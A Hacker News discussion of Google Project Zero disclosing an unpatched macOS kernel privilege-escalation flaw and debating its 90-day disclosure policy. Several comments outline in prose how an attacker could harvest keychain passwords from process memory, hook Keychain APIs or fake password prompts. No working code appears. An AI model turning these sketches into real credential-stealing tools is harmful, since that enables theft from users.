Hacker News new | past | comments | ask | show | jobs | submit login
Google reveals “high severity” flaw in MacOS kernel (neowin.net)
373 points by ben201 on March 4, 2019 | hide | past | favorite | 124 comments



Quick Summary: This is a local process escalation bug. Serious, but it seems remote exploitation would require an additional bug.

Project Zero has stuck to their 90 policy with everyone. They aren't picking on Apple, they've released unpatched bugs for most major vendors.

You may disagree with publication, but keep in mind this is a bug that may be known to some already. There are literally thousands of "private exploits" available for sale if you know where to look.

The 90 day policy forces companies to make their customers safer, and if not 90 days you'd still have to pick an arbitrary length of time but companies may take a longer deadline even less seriously and miss that too (and people would criticize that too).


> Quick Summary: This is a local process escalation bug. Serious, but it seems remote exploitation would require an additional bug.

The "additional bug" could just be a compromised update of any popular application available as a free download (see [1])? Then it is serious, because people download and run all kinds of applications from any website that seems useful to them.

[1]: https://en.wikipedia.org/wiki/Transmission_(BitTorrent_clien...


Or an npm package. Or homebrew recipe. Or piping the output of curl into a shell...



Seems this comic gives the opposite evaluation from your parent post.


Yes it was a sardonic "indeed".


On the other hand zero days in OS kernels that run on millions of devices worldwide aren’t your ordinary black market exploits. I agree with publishing after 90 days. This incentivizes shipping patches quickly and fixing root causes later.


Zero-day privilege escalation bugs for macOS (not iOS) probably have no black market at all (or, whatever, the ceiling price in that black market is the public bounty value of the bug).

iOS is of course a very different story and some localhost macOS bugs might have parallels in iOS (not this one though).


Yeah, who would want to be able to target a 5% of the most well-off people in the US (based on the demographics to splurge for Apple laptops), or people in positions of influence and power (seeing that 1 in 2 politicians/CEOs/writers/journalists/musicians/etc interviewed seem to use one).


But if you have arbitrary code execution on a MacBook, you probably have everything you want from that MacBook, because consumer desktop OSes and application software is insufficiently locked down to prevent you from getting everything you'd want. Escalating from arbitrary code execution to rooting the MacBook doesn't really increase its level of interesting to you.

This is untrue for iOS, because iOS actually does have a pretty robust security model which has only-semi-trusted apps running on your skeleton key to everything.


> But if you have arbitrary code execution on a MacBook, you probably have everything you want from that MacBook

You probably have all the locally available data you could want. You may not have access to passwords, or other data that comes from actively using an online site which doesn't currently have active credentials (because they time them out or the user logged out previously). For example, depending on the person and the documents they keep locally, you might not have access to any banking information.

Privilege escalation opens up a whole slew of capabilities that make it much easier to achieve that, not to mention allowing a rootkit to get access back immediately after a reboot.

Local account exploits are like a burgler breaking in (even repeatedly) while you aren't home. Privilege escalation is like them installing a remote camera system and recording your every action while you are home. Both are pretty horrible, but certain things are much more likely to be exposed with active monitoring of what you are doing over extended periods...


Ish. I think with a user process in OsX you don’t get passwords saved in keychain, which might well be what you are really after, these days.


With arbitrary code execution you can just wait around until the keychain is used and then grab it out of that process's memory, or prompt the user to unlock it with a convincing-sounding dialog, or whatever.


You would have to know where to look in some specific process memory or have a very convincing prompt to trigger keychain unlock. Doable, sure; but not trivial, and very targeted.

As an aside, any app that triggers gratuitous keychain prompts (I’m looking at you, Skype and Outlook for mac) is a weapon of mass-miseducation. People should think long and hard before authorizing keychain access; if you keep firing prompts at them, they’ll end up clicking/tapping without reading what it’s for, which is a recipe for phishing.


> You would have to know where to look in some specific process memory or have a very convincing prompt to trigger keychain unlock. Doable, sure; but not trivial, and very targeted.

I don't think it's that hard: it's basically equivalent to finding the value of a variable in a coredump, which is a thing I've done a lot and which debuggers explicitly help you with, even if it's a release build without debug symbols. One way to do it is to inject a controlled password into the same build of the program on your own machine, dump its memory, search for the password, and then reverse ASLR if needed (which is easy if you have full memory read/write access; the point of ASLR is to make limited-access vulnerabilities like small stack overflows hard to exploit, but sort of by definition the information about where libraries are is located somewhere in the process so that the process itself can run). You can then script doing the same thing once per current-ish release build per current-ish OS, and get a robust automated attack.

In general I think people overestimate the difficulty of doing clever things with process memory (one of my favorites here is the "Vudo" exploit from 2001 http://phrack.org/issues/57/8.html in which sudo could be tricked into temporarily writing a 0 byte one past the end of a buffer and then restoring the original byte, and it's still exploitable to get root). If you haven't done it yourself, it sounds harder than it is, and betting that it's hard because it sounds complicated when there's no actual isolation boundary is more-or-less security by obscurity.

The same thing applies to triggering keychain prompts: use a side channel (e.g., polling the stack of a legitimate process) to figure out when the user is likely to need a keychain unlock, then trigger a keychain unlock for your app at the same time. (Note that you can either pop up a dialog on your own or actually request keychain access for your own process.) You also might not even need to time it: just rely on the fact that the vast majority of users are going to respond to security prompts in a way that appears to unblock their jobs, without evaluating whether the prompt is reasonable. See studies on click-through rates of cert warnings before they got hard to click through, the continued effectiveness of phishing / spear-phishing, etc. If you pop up a dialog saying "Java Updater needs your password," I bet you'll get a ton of people who don't even have Java installed type in their password.


You hook Apple's Keychain access API in every running app and then intercept passwords coming from it before they're returned to the requesting application. Every app using the Keychain is using the same API and you can easily enumerate the loaded dylibs to find the functions to hook.


Maybe I'm missing something, but reading something from another process' memory isn't a thing you can do, is it?


In general, for processes running as the same user on traditional desktop / server OSes (Windows, Mac, UNIX), it is. On mobile it's not because they had no backwards compatibility to care about (specifically, iOS applies heavy sandboxing to apps and Android runs them as different Linux user IDs). And desktop app stores are moving towards the same model. On Linux, SELinux/AppArmor/etc. might also prevent this depending on config.

More fundamentally, an unsandboxed process can do things like set environment variables, update config files, modify applications installed into the user's home directory, read your browser cookies, etc. as a consequence of traditional desktop apps having unrestricted access to the user's home directory, so preventing reading memory doesn't really prevent one app from attacking another.


Huh. Thanks, I'm surprised I didn't know that.


I don't think that's true at all, not since like Win95 days at least...

Perhaps I'm also completely misinformed or misunderstanding what GP is saying but each process is meant to get it's own virtual address space


Yes, processes get their own address space, but there are APIs to read/write the address space of other processes, and on traditional desktop OSes, those APIs are accessible to other processes running as the same user. Virtual address spaces are for a) protection between processes running as different users and b) stability when other processes are incompetent but not malicious.

Windows: https://docs.microsoft.com/en-us/windows/desktop/api/memorya...

macOS (Mach): https://developer.apple.com/documentation/kernel/1402405-mac...

Linux: /proc/*/mem or http://man7.org/linux/man-pages/man2/process_vm_readv.2.html

and so forth.


I was under the impression that on macOS you ultimately needed to get the task_t to do stuff with a target task, and that getting this for a target task was a privileged operation (unless the target task sent it to you).


True - it has been getting increasingly hard on macOS (I just tried lldb on the command line and it's complaining about System Integrity Protection). It might actually be at the point where malicious software can't get access even with some cleverness?


Yes, they do get their own virtual address space, but any process running as your user can manipulate any file that user has access to (by default, without any sandboxing, which some recent apps on macOS/Linux do use, but which is not the default). Often any process running as a user can attach a debugger to any other process running as that user, which is tantamount to having complete control of that process (because a debugger can read and write memory).


Separate address spaces mean that one process won't accidentally stomp on or read from other processes' memory, not that they can't if they choose to. A debugger is the canonical example of something that's sole purpose is to inspect and modify the state of another process. There are some permissions and restrictions around the ability to do this, but most desktop OS's won't stop a user from doing so to processes they own.


How about all the other password managers, especially Chrome's?


It depends how well they are implemented (what is stored where, how it is stored and accessed, etc). It would be certainly trivial to grab the necessary files from a Chrome or Firefox profile, but if they are well-encrypted they could be practically uncrackable (although, as we know, that definition changes so fast these days). At that point it becomes about attacking or impersonating the actual process, which is not that easy - you might need another exploit for the app, or replacing the entire app without arising suspicion (a lot of apps are not even installed in the user profile, so this might well be impossible). In the end, it very much depends, but I don’t think it’s as trivial as some suggest - at least for mass-attacks/viruses, specific targeting is a different ballgame.


Nowadays I don’t think chrome even stores the passwords locally. Maybe for signed out users but it seems like all my passwords are stored at passwords.google.com.


It very much stores the passwords locally, even if you enable syncing. It wouldn't make sense for it not to.


Gnome keyring was storing credentials in memory in plain text until very recently

https://nvd.nist.gov/vuln/detail/CVE-2018-20781


Does root access directly get you keychain credentials (or does it only get it via the possibility of key logging)?


In the past, you’d be able to read it out of the process memory when the keychain was unlocked. I believe that’s been locked down in the last couple of releases, however.


If it's so important a target, the people who say this should be able to produce (even a questionably sourced!) price list with fat dollar amounts for macOS local privilege escalation. Then at least it would be a poorly supported argument instead of merely an argument by motivated conspiratorial reasoning.


I'll comment against my own rhetorical interest here and point out that Zerodium has macOS LPE (with sandbox escape) listed at "up to $6k". But they list a bunch of things I'm not really confident they actually "want" to buy.


Is it against rhetorical interest? Granted, I didn't define 'fat dollar amounts' but $6k is not that fat nor does it sound to me like it's significantly more than you'd get for that type of bug from Apple.


[flagged]


Even if you weren’t hilariously inappropriate in your choice for who to level that criticism at (check his profile) this comment doesn’t contribute anything of value since you didn’t engage with any of the concrete points being discussed.


you can assume tptacek has a bit more informed position on this than that of a "mac user trying to ignore the problem"


Well, as a lot of developers use OSX, i could see the potential of making code / token / authentication sniffing malware that sniffs out git credentials and other authentication tokens. This could then be used to gain access to backend servers and/or injecting backdoors and malware into software.


This bug requires local code execution capabilities. How many of the scenarios you describe are there where someone couldn’t simply use that to harvest credentials directly?


Is macOS not large enough target, or is there something else at play here?


I would guess most of the things you'd want to do on a mac, you can just do as a user - - you can already access everything in the user's home directory for example.


Not in macOS Mojave. Sensitive directories (Safari, Mail, etc.) are inaccessible to apps without permission.


>you can just do as a user - - you can already access everything in the user's home directory for example

As opposed to what other operating system? Even Linux with SELINUX allows that...


As opposed to Android, iOS… and some rare case of sandbox linux apps (small subset of flatpak, snap, etc.)


If we're talking about sandboxing, then macOS has that too. Apps installed through the MAS have specific sandboxes they can play in and require permission for the others.


https://xkcd.com/1200/ points out that if malicious code runs as a user they can read my e-mails, access all my files, and keylog my passwords. By escalating to root, they can... what? Install OS updates and drivers? Mount and unmount disks? Access the serial port? Persist their access in a slightly harder to detect manner?

Of course, it's a different matter for shared computers in school computer labs. Or if mac servers were a thing.


It would be difficult for an arbitrary process to do that on macOS. They can access your files, but your passwords are in the keychain and emails in a data vault, both of which require permission to access.


Install ransomware that is annoying to remove.


Does it really matter if the ransomware is easy to remove? If you remove the ransomware, your files will still be encrypted.


Solid point.


It’s a minuscule market. 1% of the desktop market, which itself is a market in decline.


The size of the market alone is not a good indicator. Macs are routinely sighted among C-level executives or journalists, and among their family members. And it looks like the kind of issue that could be exploited as part of an APT. It's pretty much the kind of thing that you expect to pop up for sale in shady places.


I sometimes see people make the argument that the tiny amount of Mac-users are somehow more important/valuable compared to the immense swath of non-Macs out there, and I always suspect it’s Mac-users trying to assert their own importance, stroke their own ego and/or justify their needless expenditure.

So tell me kind sir: what OS do you use?


I'm a Linux user who much prefers Linux to Mac and I agree with the comment you're replying to.


Exactly. I run my own arch distro and still recognize that macs are used by large numbers of higher ups in every single company I consult at.


I run Linux (edit: and a bunch of OpenBSD virtual hosts, I guess?) and don't own any Apple device. Sorry :).


1% of the desktop market? No way. It's at least 10%.


10% of laptops maybe but 10% of desktops? Think of all those thousands of Windows desktops in offices everywhere around the world.


Probably not that high worldwide. Either way, it’s still tiny and shrinking.


10% is neither "tiny" nor shrinking. If anything their year over year numbers are better compared to the overall market...


The opposite, it’s a massive target. I believe the reasoning is that because it is such a large target the black market doesn’t set the price. It gets set by the bounty price the maintainer offers. I’m not familiar with the dynamics of the zero-day black market so I wouldn’t know myself.


It's just that the bug is worthless, beyond what the vendor will pay for it in a bounty.


Why is iOS a different story?


iOS is one of the world's 3 most important COTS platform targets, along with Chrome and (guessing?) Windows. Localhost privilege escalation on iOS can be a a link in a drive-by jailbreak chain.


Are there non COTS platform targets more important/valuable than iOS/Chrome/Windows?

Some kind of embedded/industrial control system? z/OS?


iOS has universal inter-app sandboxing. macOS is getting there, but not quite yet. So on iOS, a privilege escalation vulnerability is useful for getting data out of a different unprivileged context; on macOS, you might already be in that context.


It’s a big and hard-to-exploit target?


It would be easier to justify this if apple responded to their bugs.


Seriously, there are open Safari bugs that have existed in Apple's system for 6+ years. At least slap a wontfix on there.



I'm trying to figure out what the expected behavior (and fix) should be. Basically the bug is that a external process could posion a processes version of a file by silently manipulating the file and causeing the file to be reread.

Given the requirements that a secondary process should even be able to modify a file that is already open, I guess the expected behavior is that the 1st process's version should remain cached in memory while allowing the on-disk (CoW) version to be updated? While also informing the 1st process of the update and allowing the 1st process to reload/reopen the file if it chooses to do so. If this is the intended/expected behavior, then it follows that pwrite() and other syscalls should inform the kernel and cause prevent the origional cache from being flushed.


From what I understand, that seems about right. I don't think the first process's version should necessarily remain in the page cache, but it should not be reread from the (modified) backing filesystem.


Still don't understand it though. If the bad code is already able to alter the files on disk is it really make a difference whether the data was altered before or after the using code had mapped it into its memory ? Either the file is changed before the process starts, in which case it already gets bad data, or it is altered after in which case it only sees it after experiencing memory pressure.

Wouldn't the issue be the change on disk in the first place ?


Reading the bug report it sounds like it has more to do with the Copy-on-Write behavior.

If I've understood correctly, I think it works something like this:

A privileged process needs to use some shared-object/library, and the OS loads that file into memory for it.

An unprivileged process creates an exact duplicate of the library file and asks the OS to load that into memory. This triggers the copy-on-write system to realize that these are identical, and creates a link between them so that both processes are using the same chunk of memory.

The privileged process then doesn't actually use the library for a while, so the OS pages it out of memory, while keeping that copy-on-write link around.

This is where the sneaky/buggy part lies, in that it's possible for the unprivileged process to modify its version of the library file without the copy-on-write system being informed of the write (and thus separating the two diverging copies). This is apparently related to some details of how mounting filesystem images works.

The next time the privileged process tries to use the library, the OS sees that it has already been paged out, but hey here's this copy-on-write link pointing at this "identical" version over here, and loads the poisoned version into the privileged process.


Thanks for this info. Yeah, this kind of scenario is unacceptable. I did not see that the files are single instanced in memory. Is the overhead for this even worth it ? Two files being loaded that are exactly identical sharing the same ram space (writable too) sounds like overhead for no usable gain. I guess when you are compressing ram anyways they might calculate checksums anyway and thus have the info to coalesce chunks, but it sounds like a really bad choice.


doing this COW stuff with file mapped pages generally must be kind of weird. like normally with a COW page you just mark the page entry as read only and then when the process tries to modify the page you create a copy of the page for that process. the only process that is modified is the process that tried to write to the page.

but with file mapped pages this is going to be a bit weird because the processes with a file page mapped MAP_SHARED should see others modifications of a MAP_SHARED page and presumably now when process modifies a file mapped page that is marked read only the kernel now has to update all the other processes to point at this new writable page. i think it is easy to modify the current process's page table, not sure how easy it is to modify other process's view of the page table. though, maybe the kernel wouldn't let you RPC a MAP_SHARED mmap. maybe it would only let you do it with a MAP_PRIVATE mmap.


Am I mistaken in thinking that Windows is immune to this kind of bug?

Also, why isn't this a problem in Linux or BSD?


> The researcher informed Apple about the flaw back in November 2018, but the company is yet to fix it even after exceeding the 90-day deadline, which is why the bug is now being made public with a "high severity" label.

Are they giving any reasons for the delay?


The reason doesn't matter. I can't think of one reason for which the delay in patching justifies not following the 90 day policy.


What if it's something nasty like Spectre, where you're coordinating at least getting some mitigations across multiple ecosystems, and disclosing the vulnerabilities (particularly, say, the Meltdown fun, or NetSpectre) without available mitigation could be disastrous?

90d seems like sufficient time for many processes, particularly if you're used to iterating in somewhat flexible or always-releasable environments, but as soon as you start involving multiple systems with different timetables, the time requirements to meet everyone's process needs can balloon, particularly if it's something requiring substantial changes (and thus, substantial testing).

(I'm in favor of the default 90d disclosure policy, just wanted to point out that there are sometimes legitimate justifications for longer timelines.)

(Work for elgooG, not on anything remotely related to GPZ, opinions my own, etc.)


> What if it's something nasty like Spectre

Exceptional case. Deadline WAS extended. Reported 01. Jun 2017, Disclosed Jan 2018

https://bugs.chromium.org/p/project-zero/issues/detail?id=12...


Here is the list of (fixed, public) cases where the deadline was extended (sorted by vendor):

https://bugs.chromium.org/p/project-zero/issues/list?can=1&q...

and here is the list bugs where the deadline expired:

https://bugs.chromium.org/p/project-zero/issues/list?can=1&q...


Imho meltdown/spectre is a bad example from this point of view: it was dealt with very badly, with lack on information to some players (e.g. openbsd if I recall correctly), and earlier disclosure than agreed (with potentially some patches rushed out the door because they were meant for days later)


IIRC OSes that weren't Windows/OSX/Linux didn't get invited to play in the embargo sandbox either until very late or not at all, so e.g. illumos and the BSDs were either completely in the dark or caught with relatively little time to do anything, especially because people inferred a bunch of the details before the embargo was supposed to expire from various patches and snippets of information leaking.

There was also the issue that gregKH complained about, where the different major Linux distros on the embargo basically got siloed by Intel out of talking to each other, so they ended up building their own solutions. [3]

[1] suggests FBSD got to the NDA sandbox relatively shortly before it went public. [2] says OpenBSD indeed did not.

[1] - https://lists.freebsd.org/pipermail/freebsd-security/2018-Ja...

[2] - https://marc.info/?l=openbsd-tech&m=151521435721902

[3] - https://www.eweek.com/security/linux-kernel-developer-critic...


I remember (but I might be misremembering) one case of an AV Vendor getting the deadline extended by a day or two as they promised the patch is as good as done. When nothing happened, Google published.


Of course reasons matter. Apple actually got some extra time when there was a fundamental flaw in XNU's task structure handling since fixing it properly required some heavy refactoring in the kernel.


Link should probably be updated to point to project zero itself: https://bugs.chromium.org/p/project-zero/issues/detail?id=17...


The comments on the page are fun if you have a few minutes.

Say what you want about Google, but groups like Project Zero and Talos from Cisco are awesome. The things they find...


I wonder what would be cheaper for Google, et al.: paying lots of engineers to bug hunt all day, or simply going out and buying a bunch or all of the high profile bugs from shady websites and then just publishing them.


I wouldn't be surprised if the value in project zero is mostly in training the engineers to find these vulnerabilities.


Consider that the most critical bugs found by black hats probably never make it out into any market, open, shady, or otherwise. They're probably kept internal to the team that found them, or sold/traded directly between organizations with long relationships.


Does this apply to files on an HD or SDD as well or is this specific to mounted images only?

(Meaning, is this about CoW in general or about memory management related to mounted images?)


This applies to copy-on-write of files on mounted disk images only.


A must-read for future OS designers...


Also a high severity flaw with this freaking butterfly keyboard. Please let the world know Google.


This is completely unrelated. Please don't use threads like these as a way to voice your complaints about Macs in general when doing so isn't relevant.


oy


90 days policy is fine. If you can fix the problem, this time will be enough to hire an entire team.


> 90 days policy is fine. If you can fix the problem, this time will be enough to hire an entire team.

Is 90 days enough to fully fix for example spectre and meltdown? I'm not sure all bugs can be fixed in 90 days. Some will take decades to resolve.


Spectre/Meltdown were given 6 months instead of the normal 90 days.


You can request for an extension (grace period). The point is, Apple didn't respond until it was too late.

https://googleprojectzero.blogspot.com/2015/02/feedback-and-...


Spectre is a special case and I think you know it's a special case. Cut it out.


Why's it not a valid counter-example? It's a special case because it doesn't fit the 90 day estimate? Well yeah that's why it's a counter-example.


Because at it's core, it's a hardware design flaw, not a software bug.

Also it affected multiple vendors, not one, so coordination across a minimum of 10 major organizations (google, apple, MS, Amazon, Intel, amd, Linux, etc.) breaks the normal assumptions behind project 0.

Given those issues, different rules make sense. It's not a normal case where a single vendor has a flaw that can be fixed with a single patch.


In past I thought that MacOS didn't have bugs, how I was wrong...


I assume you're joking.


Is there a compelling reason this is being released prior to a patch going out?


Literally the second sentence: "Its members locate flaws in software, privately report them to the manufacturers, and give them 90 days to resolve the problem before publicly disclosing it."

Privately disclosed to Apple, 90 days later they published. Simple as that.


I used to think that 90 days is quite unfair. And in many ways it can be. But it’s a great equalizer. And that way no one company can claim that some other company got preferential treatment. And everyone by now knows that that’s what it’s going to be. Instead of p0 team having to have a fruitless back and forth with vendors about the impact and what would be a reasonable timeline for disclosure.


90 days is equality but not equity. Not all bugs can be fixed in the same way. Moreover, 90 days seems arbitrary to me, unless there was some prior study behind this number.


You're absolutely right! 90 days does seem incredibly arbitrary, like it was chosen for political reasons. And this policy is definitely equal, but wildly inequitable.

Is it perhaps possible that equitable treatments of vulnerabilities and companies might not be particularly high on the list of priorities for GPZ? Some might even argue that past attempts at equitable treatment have backfired badly, with many cases of companies abusing the time this gets them to not fix vulnerabilities.

Again, you're completely correct. Though I would genuinely love to hear your ideas of what equitable policy would look like - it could easily be better!


It’s just a number that Google Project Zero has decided is what they’re going to hold companies to.


‘Holding them to’ makes it sound like Google has some kind of moral authority here.

I understand the positive incentives for publishing when companies do not respond to flaws.

However Google has no particular right to police other companies.

If they disclose at 90 days, and harm ensues, there is no defense. Google is responsible.


Google has the responsibility to inform users that the software they are using has known vulnerabilities as much as they have a responsibility to disclose them quietly to the software vendors that can fix them.

The way you laid things out, Google should just collect zero-days and sit on them? Do you see the absurdity of that? From a business perspective, having these vulnerabilities around makes it easer for their competitors to collect the same kinds of data about internet search and private emails from people around the internet that Google collects from legit means. Getting vulnerabilities fixes widens Google's data moat.

Disclosing issues is not "policing". They are not arresting people, or taking any action other than stating the truth, that some software is vulnerable.

If they disclose at 90 days and harm ensues, the user bears responsibility for continuing to use the software. If they trust the software vendor to issue timely updates, then they can turn around and lay blame at the vendor for not fixing the issue. Or they can blame the hacker.


Preferential treatment is irrelevant. If harm is done due to the public disclosure, Google is the cause.


>Privately disclosed to Apple, 90 days later they published. Simple as that.

Some bugs may take longer than that to fix. I still don't think it's an unreasonable question to ask.


The standard time frame is 45 days.

https://ics-cert.us-cert.gov/ICS-CERT-Vulnerability-Disclosu...

Google is being more than generous, doubling to 90 days.


I assume the GP was asking if the 90 day rule was really important to uphold, or if the disclosure could just be delayed longer until the patch went out.


Well,expecting there to be a patch without the 90 day exploit exposure is very generous. The whole point of a 90-day (or any arbitrary stretch of time) deadline is that a lot of companies are funny when it comes to exploits. Security doesn't ever make a company money, it's a high cost that can only (at best) hope to prevent the company from having to make reparations after a breach, maybe lose a few customers. As such, many companies treat security reports with indifference and do nothing whatsoever about reported exploits until they're forced to. The only real way private researchers or security groups like Project Zero have to light a fire under the company concerning the exploit is to release the exploit to the public when it becomes clear that the company isn't going to fix the vulnerability on their own. At least now consumers are made aware of the exploit and can make an informed decision on a plan of action. 90 days, 180 days, a year... it doesn't matter because people would criticize the length of time no matter what it is.


the process is policy and is automated, no one gets extra time. afaik the clock starts from when they get the first reply from the company


It can actually be overriden if the vendor declares a release will happen within 14 days of the 90 day deadline.


Allowing companies to take their time fixing critical security issues puts users at risk. That’s compelling enough for me. As an Apple user I’m a bit upset that they haven’t patched after over three months.


The researcher informed Apple about the flaw back in November 2018, but the company is yet to fix it even after exceeding the 90-day deadline, which is why the bug is now being made public with a "high severity" label. That said, Apple has accepted the problem and is working with Project Zero on a patch for a future macOS release. You can also view the proof-of-concept code that demonstrates the problem on the dedicated webpage here.


Presumably they want to inform users so they know they're vulnerable, if no patch is forthcoming.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: